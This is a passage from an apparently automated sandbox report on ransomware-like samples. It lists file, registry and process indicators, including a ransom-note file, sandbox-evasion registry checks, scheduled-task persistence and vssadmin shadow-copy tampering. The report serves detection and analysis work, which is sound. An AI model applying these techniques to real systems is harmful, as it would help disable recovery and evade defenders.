modification C:\Windows\Installer\MSIAFF9.tmp msiexec.exe File opened for modification C:\Windows\Installer\f781dfa.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI124E.tmp msiexec.exe File created C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT taskeng.exe File opened for modification C:\Windows\Installer\MSIA061.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1FFE.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\MSI8B3E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBB87.tmp msiexec.exe File created C:\Windows\Installer\f781e01.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID1C6.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSIB7B5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB943.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSI80A6.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIBD5C.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIC956.tmp msiexec.exe File created C:\Windows\Installer\f781dfa.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIB598.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBEC5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9A54.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI8B18.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI924E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8977.tmp msiexec.exe File opened for modification C:\Windows\Installer\f781dfe.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI86A2.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Installer\MSI1A8C.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8EAA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9D14.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3264 3740 WerFault.exe o363rXjAh1T_ZmFhEFWs6Pzs.exe 3404 188 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe 3736 188 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe 3688 188 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe 4324 188 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe 5864 188 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe 5808 188 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe 5508 188 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe 6140 5952 WerFault.exe LivelyScreenRecS1.9.exe 5380 2736 WerFault.exe v_qlaPnF5evM3dXRBD0W35_I.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
blor8zJ5PA17kKaIYWOn246T.exeoa49cpqZl5T5Pps5fyIxAXYu.exeMicrosoftEdgeCP.execsvsieasvchost.exeMmdyuBaUmiqTtz3iycBqc_Ne.exetapinstall.exetapinstall.exeDrvInst.exeDrvInst.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI blor8zJ5PA17kKaIYWOn246T.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI oa49cpqZl5T5Pps5fyIxAXYu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI csvsiea Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI csvsiea Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MmdyuBaUmiqTtz3iycBqc_Ne.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI blor8zJ5PA17kKaIYWOn246T.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI oa49cpqZl5T5Pps5fyIxAXYu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RUNDLL32.EXERUNDLL32.EXERUNDLL32.EXE1213.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1213.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1213.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4924 schtasks.exe 7744 schtasks.exe 10568 schtasks.exe 10708 schtasks.exe 8704 schtasks.exe 5992 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 9076 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
MicrosoftEdgeCP.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 11136 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5260 taskkill.exe 7200 taskkill.exe 7948 taskkill.exe 10604 taskkill.exe 8780 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
vg1a59kK32lVcmX2rJ7XCHeI.exemask_svc.exeapp.exel1cwCpgwAuhvwCl0y4f21XUm.exeDrvInst.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates vg1a59kK32lVcmX2rJ7XCHeI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs vg1a59kK32lVcmX2rJ7XCHeI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) 